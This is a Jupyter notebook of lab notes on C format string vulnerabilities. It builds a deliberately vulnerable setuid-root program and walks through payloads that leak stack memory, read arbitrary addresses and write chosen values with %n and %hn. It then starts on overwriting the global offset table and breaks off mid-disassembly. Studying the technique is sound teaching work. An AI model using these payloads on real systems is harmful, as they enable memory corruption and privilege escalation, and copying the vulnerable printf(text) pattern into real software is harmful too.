# Format Strings
http://www.cplusplus.com/reference/cstdio/printf/?kw=printf

- `printf()` in C/C++ can be used to print fixed strings, variables in many different formats
- hello.c program uses `printf()` incorrectly!
- "Hello World\n" string technically is the format string (devoid of special escape sequences called format parameters)
- format parameters begins with a `%` sign; for each format parameter (%) function expects arguments
- format specifier follows this prototype:
`%[flags][width][.precision][length]specifier`

- following parameter requires values as arguments

| Parameter | Output Type |
| --- | --- |
| %d | Decimal |
| %u | Unsigned decimal |
| %x | Hexadecimal |

- the following parameters expect pointers as arguments

| Parameter | Output Type |
| --- | --- |
| %s | String |
| %n | Number of bytes written so far |
| %p | Memory address |

In [1]:
# copy hello.c from booksrc folder
! cp booksrc/hello.c .
! ls -al hello.c

-rw-r--r-- 1 user user 78 Aug  7 10:05 hello.c


In [2]:
! cat hello.c

#include <stdio.h>

int main() {
    printf("Hello World!\n");
    return 0;
}

## Use compile.sh script to compile c programs
- disables all compiler and system level bufferoverflow protections

In [3]:
# compile and run hello.c
! cp booksrc/compile.sh .
! chmod u+x compile.sh
! ./compile.sh hello.c hello.exe

In [4]:
! ./hello.exe

Hello World!


## Format Parameters Examples
- copy fmt_strings.c from booksrc; examine, compile and run it

In [6]:
! cp ./booksrc/fmt_strings.c .

In [7]:
! cat fmt_strings.c

// fmt_strings.c

#include <stdio.h>
#include <string.h>

int main() {
   char string[10];
   int A = -73;
   unsigned int B = 31337;

   strcpy(string, "sample");

   // Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B);
   printf("[string] %s  Address %p\n", string, string);

   // Example of unary address operator (dereferencing) and a %x format string
   printf("variable A is at address: %p\n", &A);
}

In [8]:
! ./compile.sh fmt_strings.c fmt_strings.exe

In [9]:
# note high value for A: -ve value is stored in two's complement
! ./fmt_strings.exe

[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample  Address 0xffffd0a2
variable A is at address: 0xffffd09c


## Format Parameter %n Example
- %n - uncommon, but let's understand how it works
- %n - writes the number of bytes written so far to the corresponding variable's address

In [10]:
! cp booksrc/fmt_uncommon.c .

In [11]:
cat fmt_uncommon.c

#include <stdio.h>
#include <stdlib.h>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack Example
   printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

   exit(0);
}	


In [12]:
! ./compile.sh fmt_uncommon.c fmt_uncommon.exe

In [13]:
! ./fmt_uncommon.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffd0a8.  B is 7.


### structure of stack when printf( ) is called in fmt_uncommon.c
- look at the last printf()

### printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

- hint, parameters are pushed on reverse order


|Top of the stack|
| :----: |
| Address of format string (first argument)|
| Value of A|
| Address of A|
| Value of B|
| ... |
| Bottom of the Stack|

### what if fewer arguments are passed to printf()?
- printf("A is %d and is at %08x. B is %x.\n", A, &A);

In [14]:
! sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c

In [15]:
! diff fmt_uncommon.c fmt_uncommon2.c

14c14
<    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
---
>    printf("A is %d and is at %08x.  B is %x.\n", A, &A);


In [16]:
! ./compile.sh fmt_uncommon2.c fmt_uncommon2.exe

In [17]:
! ./fmt_uncommon2.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffd0a8.  B is 804845d.


## The Format String Vulnerability
- if string is printed directly `printf(string)` instead of `printf("%s", string)`
- compile and run fmt_vuln.c from booksrc folder

```bash
$ ./compile.sh fmt_vuln.c fmt_vuln.exe
$ sudo chown root:root ./fmt_vuln.exe
$ sudo chmod u+s ./fmt_vuln.exe
$ ./fmt_vuln.exe testing
$ ./fmt_vuln.exe testing%x
$ ./fmt_vuln.exe $(perl -e 'print "%08x."x40')
```

- print four repeating bytes in reverse order (little-endian architecture)
- $ printf "\x25\x30\x38\x78\x2e\n"
    - these are the arguments for format string stored in higher memory addresses

In [19]:
! cp ./booksrc/fmt_vuln.c .
! cat fmt_vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}


In [20]:
! echo user | sudo -S ./compile.sh fmt_vuln.c fmt_vuln.exe

[sudo] password for user: 

In [21]:
# user is password for sudo user
! echo user | sudo -S chown root:root ./fmt_vuln.exe

[sudo] password for user: 

In [22]:
# check ownership of the fmt_vuln.exe
! ls -al fmt_vuln.exe

-rwxr-xr-x 1 root root 9624 Aug  7 10:12 fmt_vuln.exe


In [23]:
! echo user | sudo -S chmod u+s ./fmt_vuln.exe

[sudo] password for user: 

In [24]:
! ls -al fmt_vuln.exe

-rwsr-xr-x 1 root root 9624 Aug  7 10:12 fmt_vuln.exe


In [25]:
# run fmt_vuln.exe
! ./fmt_vuln.exe

Usage: ./fmt_vuln.exe <text to print>


In [26]:
! ./fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [27]:
# what if you provide %s as value
! ./fmt_vuln.exe testing%s
# notice testing repeats twice!

The right way to print user-controlled input:
testing%s
The wrong way to print user-controlled input:
testingtesting%s
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [28]:
# what if you provide %x as value
! ./fmt_vuln.exe testing%x

The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingffffccb0
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [46]:
# process can be used repeatedly to examine stack memory
# just provide a lot of format parameter as string and see what's on stack
! ./fmt_vuln.exe $(perl -e 'print "%08x."x40')

The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
bfffe780.00000000.b7fff858.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [29]:
# bunch of 2e78383025 are repeated
# each four bytes values are reversed due to little-endian architecture
! perl -e 'print "\x25\x30\x38\x78\x2e"'

%08x.

In [31]:
# try to print the same results in string
! ./fmt_vuln.exe $(perl -e 'print "%s."x40')

The right way to print user-controlled input:
%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.
The wrong way to print user-controlled input:
Segmentation fault


## Reading from Arbitrary Memory Addresses
- `%s` format parameter can be used to read from arbitrary memory addresses
- part of the original format string can be used to supply an address to the %s format parameter
- if a valid memory address is used, this process could be used to read a string found at that memory address
- compile and run booksrc/getenvaddr.c
- use the path address to provide the value for %s
```bash
$ ./fmt_vuln.exe $(print "\x address in reverse bytes")%08x.%08x.%08x.%s
```

In [32]:
! ./fmt_vuln.exe AAAA.%08x.%08x.%08x.%08x
# notice that fourth parameter is repeating from begnning of the format string 
# AAAA to gets its data

The right way to print user-controlled input:
AAAA.%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAA.ffffcca0.f7dd0658.080484f0.41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [62]:
! ./fmt_vuln.exe AAAA%08x.%08x.%08x.%s
# why do we get segfault?
# it's attempting to print string at the address AAAA

The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
Segmentation fault


In [33]:
# how about we provide some valid memory address instead of AAAA
! env | grep $PATH

PATH=/home/user/miniconda3/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games


In [34]:
# compile and run getevnaddr.c to find the memory address of env variables respective to programs
! cp ./booksrc/getenvaddr.c .

In [35]:
! cat getenvaddr.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}


In [36]:
! ./compile.sh getenvaddr.c getenvaddr.exe

In [37]:
! ./getenvaddr.exe PATH ./fmt_vuln.exe

PATH will be at 0xffffd637


In [38]:
# lets try to read the value of PATH using fmt_vuln.exe
! ./fmt_vuln.exe $(perl -e 'print "\x37\xd6\xff\xff"')%08x.%08x.%08x.%s

The right way to print user-controlled input:
7���%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
7���ffffcca0.f7dd0658.080484f0.ome/user/miniconda3/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
[*] test_val @ 0x0804a02c = -72 0xffffffb8


### Notice /h is missing from /home/user/...
- this is because getenvaddr.exe (14) is 2 bytes longer that fmt_vuln.exe (12)
- we can stubtract 2 from the least siginificant byte by reducing the PATH address by 2 bytes

In [39]:
! printf "%x" $((0x37-2))

35

In [40]:
! ./fmt_vuln.exe $(perl -e 'print "\x35\xd6\xff\xff"')%08x.%08x.%08x.%s
# now we see our complete path

The right way to print user-controlled input:
5���%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
5���ffffcca0.f7dd0658.080484f0./home/user/miniconda3/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
[*] test_val @ 0x0804a02c = -72 0xffffffb8


## Writing to Arbitrary Memory Addresses
- %s is used read an arbitrary memory address
- `%n` format parameter can be used to write to arbitrary memory address
- `test_val` variable has been printing its address and value in the debug statement
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%08x.%08x.%08x.%n
```
- the resulting value in the test variable depends on the number of bytes written before the `%n`
- this can be controlled to a a greater degree by manipulating the field width option
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%100x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%400x%n
```

In [85]:
! fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [42]:
# test_val is @ 0x0804a02c
# instead of reading test_val, let's write to it
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%08x.%08x.%08x.%n
# Notice the test_val which is the total bytes written thus far by printf()

The right way to print user-controlled input:
,�%08x.%08x.%08x.%n
The wrong way to print user-controlled input:
,�ffffcca0.f7dd0658.080484f0.
[*] test_val @ 0x0804a02c = 31 0x0000001f


In [43]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%x.%n

The right way to print user-controlled input:
,�%x.%x.%x.%n
The wrong way to print user-controlled input:
,�ffffcca0.f7dd0658.80484f0.
[*] test_val @ 0x0804a02c = 30 0x0000001e


In [44]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%100x.%n

The right way to print user-controlled input:
,�%x.%x.%100x.%n
The wrong way to print user-controlled input:
,�ffffcca0.f7dd0658.                                                                                             80484f0.
[*] test_val @ 0x0804a02c = 123 0x0000007b


In [45]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%200x.%n

The right way to print user-controlled input:
,�%x.%x.%200x.%n
The wrong way to print user-controlled input:
,�ffffcca0.f7dd0658.                                                                                                                                                                                                 80484f0.
[*] test_val @ 0x0804a02c = 223 0x000000df


## Writing User-Controlled Values (0xaddress)
- the above trick (manipulating width) works for small numbers but won't work for large ones like memory addresses
- let's write 0xDDCCBBAA to variable test_val
- 0xAA goes to least significant byte, 0xBB to next byte and so on and 0xDD goes to the most significant byte
- 0xAA -> 0x0804a02c
- 0xBB -> 0x0804a02d
- 0xCC -> 0x0804a02e
- 0xDD -> 0x0804a02f

In [46]:
# findout the width value to print 0xaa in the right location
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�%x%x%8x%n
The wrong way to print user-controlled input:
,�ffffcca0f7dd0658 80484f0
[*] test_val @ 0x0804a02c = 28 0x0000001c


In [47]:
# 0xaa is final value - 28 is what width 8 provides
!echo $(( 0xaa - 28 + 8))

150


In [48]:
# replace width 8 with 150
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%150x%n
# text_val = 0x000000aa
# we've aa least significant byte in right the place

The right way to print user-controlled input:
,�%x%x%150x%n
The wrong way to print user-controlled input:
,�ffffcca0f7dd0658                                                                                                                                               80484f0
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [49]:
# next write 0xbb, 0xcc, and 0xdd
# need more %x%n format to write to each addresses
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%8x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�ffffcc90f7dd0658 80484f0
[*] test_val @ 0x0804a02c = 52 0x00000034


In [50]:
# what is the width so the final value is 0xaa
! echo $(( 0xaa-52+8 ))

126


In [51]:
# replace width 8 width 126 to write 0xaa
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%126x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%126x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�ffffcc90f7dd0658                                                                                                                       80484f0
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [52]:
! echo $(( 0xbb - 0xaa ))

17


In [53]:
# now write 0xbb in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%126x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%126x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�ffffcc80f7dd0658                                                                                                                       80484f0         4b4e554a
[*] test_val @ 0x0804a02c = 48042 0x0000bbaa


In [54]:
! echo $(( 0xcc - 0xbb ))

17


In [55]:
# now write 0xcc in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%126x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%126x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�ffffcc80f7dd0658                                                                                                                       80484f0         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = 13417386 0x00ccbbaa


In [None]:
# finally write 0xdd

In [56]:
! echo $(( 0xdd - 0xcc ))

17


In [107]:
# now write 0xcc in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8100                                                                                                                             b7fff858         4b4e554a         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = -573785174 0xddccbbaa


## Direct Parameter Access
- simplified way to exploit format string vulnerability
- allows parameters to be accessed directly by using the dollar sign qualifier
    - e.g., `%n$d` would access the nth parameter and display it as a decimal number
- instead of sequentially accessing the first three parameters and using 4 bytes spacers of JUNK to increment the byte output count, we can use direct parameter access
- let's write a more realistic-looking address of `0xbffffd72` into the variable test_vals
- see e.g. of how direct parameter access works using example provided in demo-programs

In [58]:
! cp ./demo-programs/fmtstr_directpara.c .

In [60]:
! cat fmtstr_directpara.c

#include <stdio.h>

int main() {
    printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
    return 0;
}


In [59]:
! ./compile.sh fmtstr_directpara.c directpara.exe

In [61]:
! ./directpara.exe

7th: 70, 4th: 00040


In [62]:
# without direct access
! ./fmt_vuln.exe AAAA%x%x%x%x

The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAffffcca0f7dd065880484f041414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [63]:
# access the fourth argument (from beginning of the format string)
# $ sign is special character for bash so must be escaped
! ./fmt_vuln.exe AAAA%4\$x

The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [64]:
# use the same technique to write to 4th argument
! ./fmt_vuln.exe $(perl -e 'print "AAAA"')%4\$n

The right way to print user-controlled input:
AAAA%4$n
The wrong way to print user-controlled input:
Segmentation fault


In [65]:
# don't get segfault if AAAA was a valid memory address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%4\$n

The right way to print user-controlled input:
,�%4$n
The wrong way to print user-controlled input:
,�
[*] test_val @ 0x0804a02c = 4 0x00000004


In [66]:
# no need of JUNK just use direct parameter access to write the rest
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%4\$n

The right way to print user-controlled input:
,�-�.�/�%4$n
The wrong way to print user-controlled input:
,�-�.�/�
[*] test_val @ 0x0804a02c = 16 0x00000010


In [67]:
# do some math to print 0x72 of our controlled address: 0xbffffd72
! echo $((0x72 - 16))

98


In [68]:
# use 98 as width to get 0x72 as least significant value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffcca0
[*] test_val @ 0x0804a02c = 114 0x00000072


In [69]:
# do some math to print 0xfd of our controlled address: 0xbffffd72
! echo $((0xfd-0x72))

139


In [70]:
# use 139 as width to get 0xfd as next value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n%139x%5\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffcc90                                                                                                                                   f7dd0658
[*] test_val @ 0x0804a02c = 64882 0x0000fd72


In [71]:
# do some math to print 0xff of our controlled address: 0xbffffd72
! echo $((0xff-0xfd))

2


In [72]:
# width of 2 doesn't work; shorter than memory address!
# do some math to print 0xff of our controlled address: 0xbffffd72
! echo $((0x1ff-0xfd))

258


In [73]:
# use 2 as width to get 0xff as next value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n%258x%6$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffcc80                                                                                                                                   f7dd0658                                                                                                                                                                                                                                                           80484f0
[*] test_val @ 0x0804a02c = 33553778 0x01fffd72


In [74]:
# do some math to print 0xbf of our controlled address: 0xbffffd72
! echo $((0xbf-0xff))

-64


In [75]:
# negative width will not work!
! echo $((0x1bf-0xff))

192


In [76]:
# use 2 as width to get 0xff as next value
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08" . "\x2d\xa0\x04\x08" . "\x2e\xa0\x04\x08" . "\x2f\xa0\x04\x08"')%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n%258x%6$n%192x%7$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffcc80                                                                                                                                   f7dd0658                                                                                                                                                                                                                                                           80484f0                                                                                                                                                                                         804a02c
[*] test_val @ 0x0804a02c = -1073742478 0xbffffd72


## Using Short (2 bytes) Writes
- a `short` is typically a two-byte word using `h`
- helps write an entire four-byte value with just two `%hn` parameters
    - instead of 4!
- let's overwrite test_val variable with the address `0xbffffd72`

In [78]:
# update least significant byte
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%x%n

The right way to print user-controlled input:
,�%x%x%x%n
The wrong way to print user-controlled input:
,�ffffcca0f7dd065880484f0
[*] test_val @ 0x0804a02c = 27 0x0000001b


In [77]:
# update first two bytes starting
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%x%hn

The right way to print user-controlled input:
,�%x%x%x%hn
The wrong way to print user-controlled input:
,�ffffcca0f7dd065880484f0
[*] test_val @ 0x0804a02c = -65509 0xffff001b


In [80]:
# short write can be used with direct parameter access
# update last two bytes
! ./fmt_vuln.exe $(perl -e 'print "\x2e\xa0\x04\x08"')%4\$hn

The right way to print user-controlled input:
.�%4$hn
The wrong way to print user-controlled input:
.�
[*] test_val @ 0x0804a02c = 327608 0x0004ffb8


In [81]:
# lets write 0xbffffd72 to test_val
# 0xfd72 is written in first two (lower) bytes
# Since 8 bytes of memory addresses will be written, subtract it from actual
#  ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08\x2e\xa0\x04\x08")%[w]x%4\$hn%[w]x%5\%hn
! echo $((0xfd72-8))

64874


In [79]:
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08\x2e\xa0\x04\x08"')%64874x%4\$hn

The right way to print user-controlled input:
,�.�%64874x%4$hn
The wrong way to print user-controlled input:
,�.�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            

In [82]:
# 0xbfff is written in last two (higher bytes)
! echo $((0xbfff-0xfd72))

-15731


In [83]:
# smaller than previous width so..
! echo $((0x1bfff-0xfd72))

49805


In [84]:
# finally write 0xbffffd72 to test_val using 4th and 5th parameters
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08\x2e\xa0\x04\x08"')%64874x%4\$hn%49805x%5\$hn

The right way to print user-controlled input:
,�.�%64874x%4$hn%49805x%5$hn
The wrong way to print user-controlled input:
,�.�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                

## Control the execution flow of the program
- overwrite the return address in the most recent stack frame
- stack-based overflow only allows overflowing return address
- format string vulnerability provides the ability to overwrite any memory address!!

### Detours with .dtors
#### .dtors and .ctors are called something different in modern gcc and not sure
#### !!!ignoring!!!
- in GNU C compiled programs, special table sections called .dtors and .ctors are created
- .dtors are made for destructors
- .ctors are made for constructors
- a function can be declared as a destructor function by defining the destructor attribute
- let's see dtors_sample.c

In [85]:
! cp ./booksrc/dtors_sample.c .

In [86]:
! cat dtors_sample.c

#include <stdio.h>
#include <stdlib.h>

static void cleanup(void) __attribute__ ((destructor));

int main() {
   printf("Some actions happen in the main() function..\n");
   printf("and then when main() exits, the destructor is called..\n");

   exit(0);
}

void cleanup(void) {
   printf("In the cleanup function now..\n");
}


In [89]:
! ./compile.sh dtors_sample.c dtors_sample.exe

In [90]:
! ./dtors_sample.exe

Some actions happen in the main() function..
and then when main() exits, the destructor is called..
In the cleanup function now..


In [91]:
# nm command can be used to find the address of the cleanup()
# look for __DTOR_LIST__ and __DTOR_END__ 
# wont' find it!!

! nm ./dtors_sample.exe

0804a020 B __bss_start
0804848e t cleanup
0804a020 b completed.6612
0804a018 D __data_start
0804a018 W data_start
08048390 t deregister_tm_clones
08048370 T _dl_relocate_static_pie
08048410 t __do_global_dtors_aux
08049f0c t __do_global_dtors_aux_fini_array_entry
0804a01c D __dso_handle
08049f14 d _DYNAMIC
0804a020 D _edata
0804a024 B _end
         U exit@@GLIBC_2.0
08048528 T _fini
0804853c R _fp_hw
08048440 t frame_dummy
08049f08 t __frame_dummy_init_array_entry
08048770 r __FRAME_END__
0804a000 d _GLOBAL_OFFSET_TABLE_
         w __gmon_start__
080485cc r __GNU_EH_FRAME_HDR
080482c8 T _init
08049f0c t __init_array_end
08049f08 t __init_array_start
08048540 R _IO_stdin_used
08048520 T __libc_csu_fini
080484c0 T __libc_csu_init
         U __libc_start_main@@GLIBC_2.0
08048446 T main
         U puts@@GLIBC_2.0
080483d0 t register_tm_clones
08048330 T _start
0804a020 D __TMC_END__
080484b9 T __x86.get_pc_thunk.ax
08048521 T __x86.get_pc_thunk.bp
080483

In [92]:
! nm ./dtors_sample.exe | grep DTOR

In [93]:
! nm ./fmt_vuln.exe | grep DTOR

In [94]:
# display all section headers
!readelf -S dtors_sample.exe

There are 34 section headers, starting at offset 0x1f84:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048154 000154 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048168 000168 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048188 000188 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        080481ac 0001ac 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481cc 0001cc 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804822c 00022c 00004f 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804827c 00027c 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         08048288 000288 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             080482a8 0002a8 000008 08   A  5   0  4
  [10] .rel.plt     

In [95]:
# objdump command shows the actual contents of the .dtors section
! objdump -s -j .dtors ./dtors_sample.exe


./dtors_sample.exe:     file format elf32-i386

objdump: section '.dtors' mentioned in a -j option, but not found in any input file


In [96]:
! objdump -h ./dtors_sample.exe


./dtors_sample.exe:     file format elf32-i386

Sections:
Idx Name          Size      VMA       LMA       File off  Algn
  0 .interp       00000013  08048154  08048154  00000154  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  1 .note.ABI-tag 00000020  08048168  08048168  00000168  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  2 .note.gnu.build-id 00000024  08048188  08048188  00000188  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  3 .gnu.hash     00000020  080481ac  080481ac  000001ac  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  4 .dynsym       00000060  080481cc  080481cc  000001cc  2**2
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  5 .dynstr       0000004f  0804822c  0804822c  0000022c  2**0
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  6 .gnu.version  0000000c  0804827c  0804827c  0000027c  2**1
                  CONTENTS, ALLOC, LOAD, READONLY, DATA
  7 .gnu.version_r 00

## Overwriting the Global Offset Table
- PLT (procedure linkage table) is used to store shared library
- consists of many jump instructions each one corresponding to the address of a function
- each time a shared function needs to be called, control will pass through the PLT
- objdump program can be used to see .plt section
- exit() is called at the end of the program
- if exit() function can be manipulated to direct the execution flow into shellcode, a root shell will be spawned
- most of the functions are not jumping to addresses but to pointers to addresses
    - e.g., exit() function's address is stored at `0x0804a018`
- these addresses exist in another section, called the global offset table (GOT) which is writable

In [1]:
! objdump -d -j .plt ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386


Disassembly of section .plt:

08048350 <printf@plt-0x10>:
 8048350:	ff 35 04 a0 04 08    	pushl  0x804a004
 8048356:	ff 25 08 a0 04 08    	jmp    *0x804a008
